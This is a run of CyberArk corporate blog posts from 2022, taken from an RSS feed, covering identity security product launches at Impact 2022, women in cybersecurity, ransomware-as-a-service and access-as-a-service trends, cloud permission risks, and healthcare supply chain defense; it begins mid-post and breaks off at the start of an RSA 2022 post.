Teams no longer need to dig through logs to figure out what went wrong – and if they do opt to review logs and session recordings, they can skip ahead to the moment the risky behavior occurred. This enhanced, real-time visibility into user activity can help reduce the risk of stolen credentials for both workforce and IT users as they access web applications and infrastructure, while helping organizations to quickly detect and respond to potential threats before they can cause damage. And if an identity does show signs of influence from the villainous “Upside Down,” threat detection and protection capabilities give teams the right info, right when they need it, to take quick action, such as terminating user sessions.

It’s time to stop wondering why your organization’s digital identities are doing “stranger things” and how you might respond when they do. Get the real-time identity threat intelligence needed to secure your digital business from cyber attackers coming from the inside, outside or upside down.

At CyberArk, we view continuous identity threat detection and protection as an essential element of an Identity Security program that spans all workforce and privileged users. By embracing a unified approach, organizations can apply intelligent controls that correspond to the risk of a user’s session.

Identity Security Intelligence, our enhanced AI-powered analytics service that provides continuous identity threat detection and protection for workforce and privileged identities, is now generally available as part of the CyberArk Identity Security Platform shared services, enabling CyberArk SaaS customers to holistically protect their workforce and IT users. This service is just one of many enhancements and major additions to the CyberArk Identity Security Platform showcased at CyberArk Impact 2022.

 

]]>
IMPACTful Women in Cybersecurity https://www.cyberark.com/blog/impactful-women-in-cybersecurity/ Mon, 18 Jul 2022 13:00:50 +0000 https://www.cyberark.com/?p=132555 IMPACTful Women in Cybersecurity

While cybersecurity as an industry aims to close gaps, cybersecurity as a profession has notoriously struggled with its own gaps when it comes to representation. When examining gender diversity specifically, women account for only 25% of the cybersecurity workforce today. This must change.

Bringing more women into the profession, as well as retaining and elevating more women to leadership positions, is essential to addressing widespread talent shortages and driving continued innovation. Unsurprisingly, some of the best ideas on how to make this happen come from women in the field.

At CyberArk Impact 2022, we heard perspectives from an amazing group of female cybersecurity and identity professionals – customers, partners and CyberArk employees – who explored this topic from various angles. We’ve distilled some of the major themes and takeaways here. From paying homage to computer programming’s pioneering females to offering practical ways to better balance life and work, these women truly inspired us last week in Boston.

Breaking Down Barriers to Entry  

Sparking interest in technology and cultivating cybersecurity career paths from an early age is one important way to bring more women into the fold. Partnerships with educational institutions and dedicated internship programs drive gender diversity. But not every cyber career follows a straight path. In 2021, the percentage of women leaving the workforce or transitioning to new jobs spiked by 54%, with many searching for more flexibility after shouldering enormous burdens brought on by the pandemic. We must do more to reach these women with a clear message: You don’t have to be technical to have a job in cybersecurity – there are opportunities of all kinds.

And if coding or another technical aspect of cybersecurity does intrigue you, go for it – even if you don’t have a related degree. Yonit Zamir, one of the rockstar software engineers behind our new CyberArk Identity Security Intelligence shared service, said, “I enrolled in a programming course – and haven’t stopped learning since. If you’re interested in development, grow that passion, learn new languages and tools, find opportunities to work on new things, and never give up. Employers will recognize your talent and potential.”

Shaping Modern Technology Innovations

“Women have always played, and continue to play, a critical role in shaping technology innovations,” said Laura Balboni, CyberArk product marketing manager. In fact, many of the first computer programmers were women, from trailblazing mathematician Ada Lovelace to African American females Mary Jackson, Katherine Johnson and Dorothy Vaughan, who overcame institutional racism and sexism to build the U.S. space program at NASA.

Today, as software development centers on exceptional user experience (UX), female engineers continue to bring highly valuable, innate skills to the table, such as intuition, persuasive communication styles and unique problem-solving approaches. Noa Moyal, CyberArk UX/UI group manager, product management described it this way: “Modern UX, shaped by women, is inclusive yet personalized.”

CyberArk R&D Group Manager Marina Osherov and R&D Project Manager Yael Zigdon shared their perspectives on how women also bring passion and camaraderie to complex projects, building each other up and tackling challenges during late-night calls after the kids go to bed. This dynamic duo led a large, virtual, cross-country team to roll out a new unified admin portal – one of several foundational shared services across the CyberArk Identity Security Platform. “In so many ways, our work styles balance and complement each other, and I’m so grateful for her,” said Osherov of her colleague.

Showing up and Standing up for Women at Work

Fostering inclusion in the workplace is an essential conversation for everyone. We heard from male cybersecurity professionals at the popular “Women in Security” breakfast panel during Impact, who were eager for insights on ways they can improve allyship and become better managers and colleagues. Equality, parity and inclusion were highlighted in responses. Women also encouraged one another to lead by example, take intentional steps to lift others up and use everyday moments to forge connections.

Through mentoring, sponsoring and cheerleading to openly show empathy and support, we can all do something to elevate the women we work with and help them lead.

Recapping: Who Run the World?

We’ll close by summarizing some of our favorite women in cybersecurity soundbites, tips and general sentiments from the industry’s largest gathering of Identity Security leaders:

  • Learn to be comfortable with being uncomfortable. Push others, push yourself.
  • Unapologetically bring your whole self to work each day.
  • Think about where you want to be next year (and the years after that) in your career. And say it out loud!
  • People aspire to be who they can see. Make yourself available and open for organic interactions and connections.
  • On the constant family/work/life juggle: Be purposeful with your time, push to prioritize. You can’t re-do milestone “one time” events like graduations – make them count.
  • And finally, to echo our hands-down favorite CyberArk Impact 2022 keynote walk-in song… “Who Run the World?” (women in cybersecurity).

Have other tips and advice to add to the list? Share them on Twitter with the hashtag #esgcyberark – we’d love to see them and continue this mission-critical conversation.

]]>
Live from Impact 2022: Identity Security Trends, Investment and New Innovations https://www.cyberark.com/blog/live-from-impact-2022-identity-security-trends-investment-and-new-innovations/ Wed, 13 Jul 2022 13:22:48 +0000 https://www.cyberark.com/?p=132530 CyberArk Impact 6 Areas of Identity Security

The cybersecurity and identity-focused professionals gathered at CyberArk Impact 2022 need little convincing that Zero Trust is a solid framework to follow. After all, they’re the ones grappling with a daunting identity dilemma: how to keep corporate resources safe and manage growing cybersecurity debt while more than half of workforce identities can access sensitive data, machine identities outnumber human identities 45:1, and any one of these identities can be used to launch an attack chain.

Instead, these dedicated pros have come to Boston (or tuned in virtually) for the Identity Security event of the year to share their stories, hear from fellow experts, and explore innovations that offer a practical path toward that “trust nothing, verify everything” standard.

The Digital World Is Complex — Securing Identities Shouldn’t Be 

Many CyberArk customers and partners recognized long ago that protecting the heart of their enterprise meant protecting privileged access. As strategic digitization, remote work, increasing cyber threats, surging compliance and cybersecurity insurance demands, and straight-up necessity began driving sweeping change across their businesses, these forward-looking security leaders were already thinking outside of the box and beyond the crumbling perimeter.

They recognize that securing identities everywhere they exist – in data centers and operational technologies, as well as in hybrid, multi-cloud and SaaS environments – is an ever-growing, multi-faceted challenge that necessitates intelligent privilege controls at the core, along with strong access management and identity management – all encompassed by data analysis and intelligence capabilities. But that doesn’t mean it has to be complicated.

This is what our CyberArk Identity Security vision is all about – using our security-first approach and deep privilege security expertise to make it easier for organizations to secure all human and machine identities accessing all resources from every location. Empowered, they can achieve measurable cyber-risk reduction, accelerate to the implementation of Zero Trust frameworks, and meet their strategic business goals.

6 Components of Identity Security

One Unified Identity Security Platform to Strengthen Cyber Resilience Across Six Key Areas

In today’s opening keynote, CyberArk Founder, Chairman and CEO Udi Mokady and members of the CyberArk executive leadership team outlined specific steps our company has taken over the past year to strengthen existing solutions and introduce new innovations to market that unify Identity Security across six key areas.

1. Workforce and Customer Access: One-quarter of professionals are projected to be fully remote by the end of 2022, and 42% follow a hybrid schedule today. The ability to access corporate resources from anywhere is a given. We’re here to help make authentication for all identities seamless and secure – whether that happens at home, the office, a conference or anywhere else. CyberArk Secure Web Sessions delivers advanced privileged access protection (think IT admin-level security) as employees access — and store their credentials for — sensitive business web and SaaS applications.

2. Endpoint Privilege Security: Our fastest-growing product line reflects heightened awareness and urgency to combat ransomware attacks at the endpoint, with layers of least privilege enforcement, application control, credential theft protection and strong multi-factor authentication for every escalation attempt. In addition to continued solution enhancements, we recently extended endpoint privilege security controls to support Linux – the platform of choice for 83.1% of developers today.

3. Privileged Access Management: Since CyberArk came to be, privileged access management (PAM) has addressed a major security challenge, and building a strong PAM foundation is how many organizations begin their Identity Security journey. We’ve continued to invest heavily in both our Self-Hosted and SaaS-based PAM solutions, and today organizations can comprehensively protect any type of privileged access with CyberArk – including Just-in-Time (JIT) vendor access to SaaS applications and JIT access to ephemeral VMs in cloud environments.

4. Secrets Management: The more organizations digitally transform, the more application secrets exist, and the more critical it becomes to simplify processes and scale protections. Our two new SaaS-based solutions were built for this. The just-announced CyberArk Secrets Hub is an integration with leading cloud-native secrets managers that gives organizations a way to centrally view, control and audit secrets without disrupting the developer experience. This means developers can keep using the cloud-native solutions they prefer, while security managers retain centralized control and can enforce unified policies over secrets using existing processes and infrastructure. (See “CyberArk Launches Secrets Hub for AWS Secrets Manager” for more details).

5. Identity Management: There are millions of identity-related events within any enterprise ecosystem – weeding through all of them (let alone prioritizing and responding to them) is a massive hurdle, and all the while, regulatory and compliance demands are mounting. To help enterprises overcome these challenges, we today introduced CyberArk Identity Flows, a single-pane identity orchestration solution that helps organizations automate identity management tasks and accelerate threat response through no-code app integrations and workflows. We also launched CyberArk Identity Compliance, a new standalone service that automates the access provisioning lifecycle and enforces strong controls – from discovery, to review, to certification – helping IT and security teams satisfy compliance, streamline audits and reduce risk.

6. Cloud Privilege Security: Our Identity Security vision extends to the cloud – an area in which 52% of organizations lack critical identity-centric security controls – and “Cloud Privilege Security” is our term for intelligent controls that help analyze, secure and monitor privileged access to the public cloud. Today, we announced CyberArk Secure Cloud Access, a new service that provisions Just-in-Time, least privilege access to cloud consoles, command lines and services, helping implement Zero Trust initiatives by reducing the risk of compromised privileged sessions and browser hijacking for DevOps and cloud operations teams.

The CyberArk platform is based on a set of foundational shared services, including the new Identity Security Intelligence service that provides continuous identity threat detection and prevention by automatically detecting anomalous user behavior and privileged access misuse for both workforce and privileged users. To learn more about how CyberArk continues to define and advance the Identity Security market, read today’s press releases.

We’re Firing on All Cylinders

The digital world is experiencing landmark changes – and landmark challenges, which are forcing organizations to rethink siloed approaches to privileged access management, access management and identity management. But we can harness these challenges and build a more secure world.

By embracing a unified Identity Security approach centered on intelligent privilege controls, organizations can better defend against their greatest source of risk and support Zero Trust adoption…

By consistently validating all access attempts.

By enforcing least privilege across the enterprise.

And by providing continuous identity threat detection and protection.

“We are firing on all cylinders at CyberArk,” said Mokady this morning. “We are investing heavily in strengthening our existing technologies. We are accelerating with new innovations. And we are just getting started.”

Thank you to all our customers and partners for being with us on this Identity Security journey, and welcome to those who have joined us this week at Impact 2022 as we prepare for cybersecurity’s next era.

For more details, read CyberArk Impact 2022 Delivers Big News and Innovation and That’s a Wrap for CyberArk Impact 2022 on Techspective.

]]>
Cyber Attack Commoditization and the Rise of Access-as-a-Service https://www.cyberark.com/blog/cyber-attack-commoditization-and-the-rise-of-access-as-a-service/ Tue, 12 Jul 2022 13:00:13 +0000 https://www.cyberark.com/?p=132493 Cyber Attack Commoditization and the Rise of Access-as-a-Service

Despite lingering, dated depictions of dark-hooded figures, cyber crime has matured into a highly professional business sector. With strong backing by organized crime syndicates and nation states, many operations look a lot like any other established business, complete with org charts, marketing teams and HR departments.

As we gear up for CyberArk Impact 2022, we asked Lavi Lazarovitz, senior director of cyber research, CyberArk Labs, to weigh in on the underground industry’s increasing ability to scale and diversify its operations, its rapidly growing managed services economy, and what attack commoditization means for defenders.

Come One, Come All: How Cyber Crime Transformation Has Leveled the Playing Field  

Legitimate enterprises across every industry are undergoing major IT transformation initiatives – involving cloud migration, automation, DevOps, hybrid work and more – to become more agile and resilient. A recent EY study found that 84% of organizations are adapting operating models, with many finding their path to transformation through managed services. “Cyber criminal enterprises are no exception, and like many businesses, they’ve been heading toward ‘as a service’ models for some time,” says Lazarovitz.

The meteoric rise in cloud services accelerated this shift. “Cyber attackers gained access to the development tools, infrastructure and other resources needed to scale their approaches,” Lazarovitz explains. Today, the dark web is teeming with darknet marketplaces such as AlphaBay and underground forums like xss[.]is and exploit[.]in, from which threat actors can sell or lease malicious tools and services. And as soon as law enforcement shuts one market down, it seems another one opens or relaunches. “Underground customers with little malware development experience can find virtually anything they need directly off the shelf, paying anonymously with cryptocurrency,” says Lazarovitz.

Ransomware-as-a-Service and Conti’s Lasting Legacy

Ransomware-as-a-service (RaaS) affiliate models – in which sophisticated threat actors typically develop malware, and either sell it as a service and profit off extortions or hire others to do their dirty work – have proven to be particularly lucrative. “Of the ransomware strains observed by CyberArk Labs, two ransomware families, Conti and LockBit, made their way to the top 10 most distributed families, based on the number of variants identified in the wild,” notes Lazarovitz.

The Conti group was a particularly sophisticated and dangerous RaaS operation, known for infiltrating organizations around the globe and weaponizing the Log4j vulnerability. However, geopolitical tensions purportedly drove a wedge between group members, leading to a massive data leak on Twitter in early 2022. The data – analyzed by CyberArk Labs – revealed information about the inner workings of the group, including its common tactics, techniques and procedures (TTPs) as well as source code for malware and tools. Increased scrutiny from law enforcement followed and the group supposedly shuttered operations in May 2022. However, based on threat intelligence reports, Conti members have started to work closely with their former associate team, TrickBot. And using the leaked Conti “blueprint,” other criminal groups have been able to fast-track development of their own RaaS variants. We’ll explore this in depth during this week’s Impact 2022 session, “Cyber Warfare: What We Can Learn from the Russia-Ukraine Cyber Attacks.”

In upleveling their businesses, organized RaaS groups have also rolled out offerings such as negotiation, payment dispute arbitration and 24/7 help centers for victim organizations. And ransomware groups keep innovating to boost their bottom lines. For instance, last year, Conti ransomware actors started selling access to victims’ networks so other groups could launch follow-on attacks, according to CISA. And triple extortions, a popular REvil technique, are increasing. These groups have proven that cyber crime pays, and as long as the returns exceed the costs, such attacks will continue to increase – especially since almost anyone can get in the game.

The Rise of “Access-as-a-Service” and Its Far-Reaching Implications

“By utilizing RaaS, ransomware operators can focus on leveraging the access they have or have purchased to make more money and impact instead of focusing on writing their own malware,” says Lazarovitz. “And just like anyone can buy a RaaS kit from one of these groups, anyone can go shopping on the dark web for RDP access for as little as $1 to $10.”

Lazarovitz explains that over the past few years, remote access has become a key commodity. Attacks targeting remote employees, third parties and exposed RDP ports are almost constant today. “Remote desktop credentials are frequently used in ransomware campaigns, such as the recent Conti campaigns, for initial access and lateral movement,” he notes. Ninety-seven percent of senior security executives say attackers are increasingly trying to steal one or more types of credentials, which often end up for sale on the dark web, a trend that has driven credential access to the top of the enterprise cyber-risk list.

Lazarovitz explains that cheap, on-demand access to human and machine identities gives attackers of all skill levels numerous opportunities that extend far beyond ransomware. “Access-as-a-service provides a legitimate way to get through the door and gain a foothold within an enterprise,” he says. And the ability to obtain privileged identities without expending much effort is a huge benefit for attackers. “By solving the identity piece of the equation, threat actors can move faster along the attack chain, reach further across supply chains and optimize the operation – making the malware more durable and flexible to run in any environment and reduce its signature, which makes it more difficult to detect,” notes Lazarovitz.

CISOs and security leaders are under enormous pressure to keep pace with this ever-evolving threat landscape – it’s a challenge that no team should face alone. This week at Impact 2022, CyberArk Labs,  CyberArk Red Team and other company experts will share a series of research-based presentations and interactive sessions – on everything from how attackers are exploiting identities and risks across the blockchain, to lessons learned from WhisperGate, HermeticWiper and other dangerous malware strains being used in cyber warfare, to new credential attack methods targeting Chromium-based browsers – to help our customers better understand what they’re up against, collaboratively tackle challenges and apply proven Identity Security approaches that reduce risk without compromise.

Explore the full agenda and get ready to make an impact at Impact 2022.

 

]]>
Take Advantage of 10 Technical Community Perks for Identity Security Success https://www.cyberark.com/blog/take-advantage-of-10-technical-community-perks-for-identity-security-success/ Thu, 07 Jul 2022 13:00:52 +0000 https://www.cyberark.com/?p=132445 10 Technical Community Perks for Identity Security Success

“There is immense power when a group of people with similar interests gets together to work toward the same goals.” – Idowu Koyenikan

Whether you’re facing a big cybersecurity challenge, evolving a program or simply looking for fast help with a question, there’s nothing more valuable than insights from those who have been in your shoes. That’s why each month, nearly 11,000 CyberArk users visit the CyberArk Technical Community — a one-stop shop for all CyberArk resources and Identity Security-related information sharing and collaboration.

Ahead of CyberArk Impact 2022, we’re highlighting 10 new and enhanced capabilities now available to Community members. If you haven’t already joined, online registration is quick and easy for all current CyberArk customers and partners.

1. Enjoy an enhanced user experience. Our reimagined portal offers a simplified, more powerful experience. Take advantage of the comprehensive search functionality to find anything you need in one click — and view the intuitive dashboard for telemetry data on your environment, such as number of tenants or active users.

2. Browse the expanded knowledge base. Access more than 4,000 articles on a wide variety of topics, security bulletins and how-to videos for common installation and configuration processes. And with at-a-glance access to information, you can ease troubleshooting and fast-track upgrade processes to keep things running smoothly.

3. Get product details at your fingertips. Explore CyberArk Docs, our complete and ever-expanding product documentation library. Inspired by the open-source community, it is completely free and fully accessible to everyone online — no registration required.

4. Join groups based on your specific interests. Join groups based on your specific Identity Security areas of interest and experience, and get notified on the latest news and updates so you’ll never miss a thing.

5. Engage in a friendly competition and showcase your expertise. Ask questions and share responses about product configurations, installations and cybersecurity best practices. By participating, you can earn points and compete for top positions on the leaderboard to showcase your expertise. With more than 14,000 active discussions, there’s something for everyone.

6. Get answers fast. Our expert bench of contributors — which comprises customers, certified partners and CyberArk employees — actively monitors community discussions and provides ready-to-share helpful tips and technical guidance. 

7. Follow and vote to help shape future content. By following a discussion or joining a group, you automatically “vote” on that topic, helping us better track and expand content based on community member interest. 

8. Submit your requests. Submit and track service requests for customized extension developments or solution upgrades and migrations. Open, edit and follow support cases in one centralized location across the community. You can even share enhancement requests and vote for your favorites. And new CyberArk customers can request encryption keys digitally to streamline onboarding.

9. Tap into world-class training and certification offerings. Access a full range of CyberArk University training and certification options to build the technical skills needed to implement and administer CyberArk Identity Security solutions, set teams up for success, and help your organization get the most out of its CyberArk investments.

10. Directly access the CyberArk Marketplace. Search and download your licensed CyberArk solutions and validated integrations with other security and digital transformation solutions that provide defense in depth and facilitate the shift toward a zero trust model.

Technical Community Feedback

“Many ideas grow better when transplanted into another mind than the one where they sprang up.”  –  Oliver Wendell Holmes

As you progress along your Identity Security journey, make sure you’re taking full advantage of the resources, expertise and collaborative insights available within the CyberArk Technical Community. Customers and partners can register or stop by today to check out our latest enhancements and take a quick video tour. While you’re exploring, head over to the Welcome Center group to introduce yourself, and let us know what you think by contacting KM@cyberark.com. Your ideas continue to power our community and shape our enhancements, and we welcome them all.

 

 

]]>
Securing Cloud Environments by Lifting the Veil on Excessive Permissions https://www.cyberark.com/blog/securing-cloud-environments-by-lifting-the-veil-on-excessive-permissions/ Tue, 05 Jul 2022 15:37:19 +0000 https://www.cyberark.com/?p=132273 Securing Cloud Environments

Have you ever written an email to your boss only to find multiple typos after you’ve sent it, or missed an important work deadline, or hastily clicked on a phishing email? It happens. There’s a saying that “perfect people aren’t real, and real people aren’t perfect.” Despite our best efforts, we all mess up.

The 2022 Verizon Data Breach Investigations Report (DBIR) found that 82% of all breaches involve the human element and 13% stem from human errors – with one error being particularly problematic: cloud service misconfigurations.

Oops, I Misconfigured It Again  

The Verizon DBIR authors write, “The rise of the Misconfiguration error began in 2018 and was largely driven by cloud data store implementations that were stood up without appropriate access controls… Despite the efforts of the major cloud providers to make the default configurations more secure (which we applaud), these errors persist.”

Cloud service misconfigurations persist for two big reasons. First, as we’ve established, people make mistakes. And second, the scale of enterprise cloud environments creates a proliferation of human and machine identities. Each of these digital identities – from cloud admins to roles used for serverless functions – can be configured with tens of thousands of permissions to access cloud services, data and other resources. Based on CyberArk Cloud Entitlements Manager data, there are now more than 28,000 identity and access management (IAM) permissions across AWS, Azure and GCP.

Appropriately scoping these permissions isn’t something most cloud teams are equipped to do. For one, cloud security is a fairly new and evolving discipline, with 70% of IT leaders saying a skills gap in this area is a “critical concern.” Even with the help of technology, it can be difficult for teams to operationalize siloed tools to discover and constantly track who has access to what. There are simply too many interconnected identities to deal with.

Overprovisioning Cloud Permissions: A Quick but Risky Fix

Overprovisioning of cloud IAM permissions – or giving identities more privileges than they need – often becomes the default solution. It’s much easier than trying to identify the proper least privilege access permissions for each identity. And giving broad access to developers and cloud engineering teams helps prevent productivity roadblocks, while also limiting IT tickets (and complaints) from cloud teams requesting access.

But cyber attackers can exploit these unused or unnecessary privileges. Once they compromise a cloud identity, they can leverage excessive permissions to move laterally through the environment or escalate privileges to reach their target. Attackers can create just as much damage by compromising or creating cloud admin accounts with powerful privileges outside of the organization’s existing privileged access management (PAM) program.

Don’t Let These Five Barriers Hold You Back from Taking Control of Your Cloud Estate

Since cloud adoption isn’t slowing down anytime soon, excessive cloud permissions will continue to pile up, contributing to cybersecurity debt and organizational risk. A new category of cloud privilege security solutions is emerging to help teams reduce these risks, including cloud infrastructure entitlements management (CIEM) technologies that harness artificial intelligence (AI) to clean up misconfigured and unused cloud permissions at scale. As teams prioritize cloud privilege security, understanding these common barriers to success can help them avoid issues as they work to take back control:

1. Lack of visibility. Organizations cannot protect what they cannot see. Identity Security becomes more important – and more difficult – as the complexity of a cloud environment grows. Security teams must be able to discover and map all identities, both human and machine, and what resources those identities can access. Intelligent privilege controls, such as monitoring activity logs, can be useful in gaining a deeper understanding of how permissions are being used. But in multi-cloud environments, this visibility cannot scale if it is limited to each individual cloud provider. It must extend across the entirety of the enterprise cloud estate.

2. Lack of granularity. Any identity can become privileged under certain conditions. The ability to monitor and identify unused permissions or misconfigurations, which could result in overprivileged accounts and the creation of shadow admins, is key to enforcing the principle of least privilege. Don’t assume your native cloud identity and access management (IAM) tools cover you on this front, as they typically don’t have the capabilities to get granular.

3. Lack of control. Standardization is the key to Identity Security at scale—yet cloud environments are complex and dynamic, with siloed IAM tooling and rulesets across AWS, Azure and GCP. This creates an inconsistent user experience, which can slow down security teams and impact operational efficiency. It also encourages an ad-hoc approach to security that can result in siloed teams and specialized knowledge of specific platforms. This makes it more difficult to consistently enforce least privilege.

4. Lack of remediation. Identifying overprivileged identities is only part of the challenge. Security teams also need deployable remediations to quickly mitigate risks without disrupting operations. While native IAM tools can identify certain threats, they lack the granular, code-level IAM policy recommendations needed to immediately rectify the issue. Cloud-native IAM tools also lack the capabilities to automatically onboard cloud admin or shadow admin accounts to an organization’s privileged access management solution.

5. Lack of broader risk mitigation. Properly securing all cloud identities from the point of creation is another important consideration, since digital identities are often spun up quickly and frequently with little regard for Identity Security best practices. Equally important is integrating CIEM and existing Identity Security programs to consistently control credentials and access. This consistency is critical to delivering measurable cyber risk reduction.

Manual, disparate methods for securing digital identities will become even more unwieldy as cloud adoption continues and digital identities surge in number. Don’t wait until “human error” simply becomes “humanly impossible.” Instead, take a centralized, intelligent approach that harnesses AI and automation to curb misconfiguration errors and lift the veil on excessive permissions to mitigate risk.

Be the first to experience new features and enhancements to the CyberArk Identity Security Platform during CyberArk Impact 2022 on July 12-14, 2022 in Boston. To save your in-person or virtual spot, register today and join us in defining the future of Identity Security.

]]>
Trust, Patient Empowerment and Data: Insights From Takeda’s Chief Digital Trust Officer   https://www.cyberark.com/blog/trust-patient-empowerment-and-data-insights-from-takedas-chief-digital-trust-officer/ Fri, 24 Jun 2022 13:00:38 +0000 https://www.cyberark.com/?p=132132 Takeda’s Chief Digital Trust Officer

It seems logical that the more data a healthcare provider can collect, the better patient treatment will potentially be. But unlike other situations where we’re generally comfortable removing the human element from the equation, such as buying groceries or banking, there is a level of cautiousness about personal health information becoming another digital commodity. How can one be certain that their “digital DNA” is only seen by those with express permission and that it’s only used for good and as intended, such as improving healthcare or driving medical advancements?

Trust is the foundation for almost every facet of our lives, particularly in healthcare. The pandemic further emphasized trust’s central role in interactions between patients and clinicians and across interconnected IT ecosystems – and brought clarity and opportunity to restore eroding trust across the industry.

In a recent episode of our “Trust Issues” podcast, we spoke with Mike Towers, chief digital trust officer at Takeda Pharmaceuticals, about his newly minted role, his vision for the future of healthcare data security and privacy, and how trust is reshaping – and expanding – the traditional CISO role. The following are some of the key takeaways from our conversation.

How CISO Becomes Chief Digital Trust Officer

“The digital trust officer role represents a significant shift that we’re taking as an organization to rewire the entire value chain around digital data and technology and establish trust at every point. It takes on a traditional CISO’s responsibilities — areas such as security operations, identity and access management (IAM), and governance and compliance — and builds upon that foundation. We’re focused on three areas of growth: No. 1 is the data space. We’re enabling the business to be much more data-driven in its decision-making and its operations by focusing on safeguarding data and governance at every point: when it’s captured, shared, extracted and moved,” said Towers.

“The second part is digital engagement: We are widening and broadening the digital reach of our company from an ecosystem perspective to include patients, physicians, payers, government entities and donors. And the third part is what I broadly call ethical analytics, or the process of gathering all this data, and applying algorithms and analytics to that data in a systematic way that considers the moral obligations of protecting and using sensitive data, such as electronic patient healthcare information (ePHI). Ethics is increasingly essential to analytics processes to overcome unintended biases or understand whether or not the analytics you’re applying fit with the original intent and purpose with which the data was captured, as examples,” he continued.

What Makes a Chief Digital Trust Officer?

Every organization is at a different point along its transformation journey, yet most share a common objective: to have a secure, flexible IT infrastructure in place that supports growth. As they rearchitect security to encompass individual identities far beyond traditional network boundaries, CISOs are beginning to embrace the role of chief digital trust officer. This emerging title signals an organization’s commitment to secure digital practices and elevates the CISO as a business enabler. While the role is still evolving at most organizations, the chief digital trust officer often leads the charge in protecting sensitive customer and company data, driving greater transparency across digital interactions and maintaining customer trust.

One of the key requirements, Towers noted, is understanding the business inside and out. “Aspiring leaders should ask themselves, ‘Do I want to be the type of security leader who can be plucked out of my role and put into a completely different industry? Or do I want to know my business deeply so I can evangelize how people, processes and technology can enable a secure digital vision?”

As chief digital trust officer, Towers described two areas he focuses on to strengthen the security and trust connection.

“Getting from security to trust begins with an understanding that the world is much bigger than your company. It requires thinking at the ecosystem scale about who deals with you beyond your employees and contracted consultants,” he explained. “Second is understanding your business value chain: Why do you exist as a company? And what full range of interactions and interconnections are necessary to deliver that value proposition?”

“For instance, in the healthcare industry, what does it mean to get from early-stage drug research to drug development, and then formalize manufacturing and supply chain processes, and then move into payment negotiations with various insurance companies or government entities? Then understanding the challenges of delivering treatments to patients, post-treatment care responsibilities and beyond.”

“In short, it’s about understanding that value chain from a business perspective — and what it will take to strengthen resilience at every point along that chain.”

What Trust Means in the Healthcare Industry

“We’re all patients,” Towers noted, which effectively sums up why trust is so critical in the healthcare field. Each one of us has interacted with a clinician at some point in our lives, placing trust in their ability to deliver care with our best interest at heart. And increasingly, we disclose our deeply personal medical information, trusting that it will stay safe and secure as it travels across expansive networks and inhabits invisible clouds.

When used effectively, technology can continuously validate trust at every interaction point to strengthen data protection and preserve privacy, for instance, authenticating a provider before they can open a medical record or verifying privileged permissions before a virtual care app can access a patient’s diagnostic data.

“Trust is needed to effectively deliver treatment and also, frankly, to instill enough confidence that the treatment you’re getting will be effective and that your data’s taken care of,” said Towers. “Moving forward, we see much more of that trust equation being based on data and digital experiences.”

For more insights, tune in to the full episode, “Why Technology is Key to Restoring Trust in Healthcare with Mike Towers,” or listen wherever you get your podcasts.

Editor’s note: Responses have been edited for length and clarity with permission.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

]]>
What’s Missing in Healthcare Ransomware and Supply Chain Defense https://www.cyberark.com/blog/whats-missing-in-healthcare-ransomware-and-supply-chain-defense/ Wed, 22 Jun 2022 13:00:50 +0000 https://www.cyberark.com/?p=132094 Healthcare Ransomware and Supply Chain Defense

The omnipresent ransomware threat is changing how healthcare organizations approach cybersecurity — from formalizing practices in an effort to obtain cyber insurance coverage to improving their ability to restore encrypted data after attacks. But as cyber attackers lean heavily on third-party vendors and suppliers to extort ransoms, remaining gaps across healthcare security frameworks are coming into focus, including a lack of Identity Security controls for securing and managing privileged accounts and third-party access.

Healthcare is Ransomware Attackers’ No. 1 Target

The average healthcare organization faced two or more ransomware attacks over the past year, found the CyberArk 2022 Identity Security Threat Landscape Report — and according to the FBI, healthcare is still the most targeted industry. While ransomware is far from new to the sector, attacks continue to grow in sophistication and scale.

healthcare ransomware timeline

Examples of recent ransomware attacks on healthcare organizations

Taking a Broader View Across the Healthcare Supply Chain

In the healthcare field, it’s common to view ransomware and other cyber threats as they relate to the electronic health record (EHR). Lisa Pino, director of the Office for Civil Rights (OCR) at the U.S. Department of Health & Human Services (HSS), recently urged covered entities and business associates to expand their thinking and approaches, writing in an HSS blog post, “Risk management strategies need to be comprehensive in scope … from software, to connected devices, legacy systems, and elsewhere across your network.”

Part of this expanded approach involves better assessing and managing cybersecurity risks associated with third-party vendors across vast healthcare supply chains. To that end, the Cloud Security Alliance (CSA) recently published agnostic guidance to help healthcare delivery organizations (HDOs) overcome pervasive challenges associated with third-party vendor evaluations and cyber risk management. In the new paper “Healthcare Supply Chain Cybersecurity Risk Management,” CSA authors outline several best practices, including:

1. Systematically inventory all third-party vendors and suppliers. Evaluations must include both direct suppliers and suppliers of suppliers, as well as non-traditional connected systems and IoT devices — all of which have information system components that could introduce cybersecurity risk, such as providing remote, third-party privileged access to critical internal resources. Report authors note that any cloud-based application or service provided must also be evaluated — including those purchased with a credit card outside of IT’s or finance’s formal procurement and approval processes.

2. Tier suppliers based on risk, using a third-party risk rating service if possible. Part two of this inventory process is categorizing vendors based on mission priority or impact to the organization, as well as level of risk. For any third-party vendor utilizing cloud services (essentially every organization today), assessments should evaluate cloud security practices across each stage of the cloud data lifecycle: create, store, use, share, archive and destroy. CSA authors offer an initial framework to follow, while encouraging organizations to also reference ISO, NIST, HITRUST and other industry standards. They note that using third-party risk rating services and qualified vendor lists can be helpful in achieving more consistent ratings.

3. Identify and define key risk areas. Privilege escalation is the No. 1 attack vector of risk for healthcare organizations today. Using stolen credentials, attackers can begin moving through systems looking for opportunities to escalate privileges and exploit powerful privileged accounts to install ransomware. Despite this reality, many healthcare organizations and their suppliers fall short in securing and monitoring privileged accounts as they focus on HIPAA-specific safeguards for securing ePHI.

4. Provide supply chain vendors with risk-prioritized action plans — and make following them a mandatory part of doing business. Extending critical Identity Security practices to include privileged access management should top healthcare organizations’ action list. Doing so can help protect against ransomware and dramatically drive down risk across the supply chain by enhancing visibility and control over privileged accounts, isolating and monitoring privileged activity, removing direct access to tier 0 systems, and minimizing credential exposure and privilege escalation opportunities.

Secure the Care Continuum With Identity Security

Properly prioritizing privileged access management as a part of a comprehensive Identity Security program can help “ensure that resources are deployed first to issues that matter most,” strengthening cyber resilience across the care continuum to improve outcomes for all.

]]>
RSA 2022, Wi-Fi Cracking Across San Francisco and How It All Comes Down to Trust https://www.cyberark.com/blog/rsa-2022-wi-fi-cracking-across-san-francisco-and-how-it-all-comes-down-to-trust/ Fri, 17 Jun 2022 13:00:25 +0000 https://www.cyberark.com/?p=132010

Trust – how to build it, how to strengthen it and how to restore it – was a major theme at RSA Conference 2022.

